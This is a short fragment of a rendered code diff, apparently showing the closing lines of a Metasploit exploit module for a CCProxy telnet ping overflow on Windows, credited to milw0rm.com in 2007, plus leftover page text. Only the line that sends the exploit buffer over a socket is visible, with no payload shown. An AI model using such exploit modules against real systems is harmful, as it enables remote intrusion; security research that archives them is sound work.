sock.put(sploit + "\r\n")
|
||||
|
||||
|
@ -113,6 +85,3 @@ class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
# milw0rm.com [2007-09-03]
|
||||
|
|
Loading…
Add table
Reference in a new issue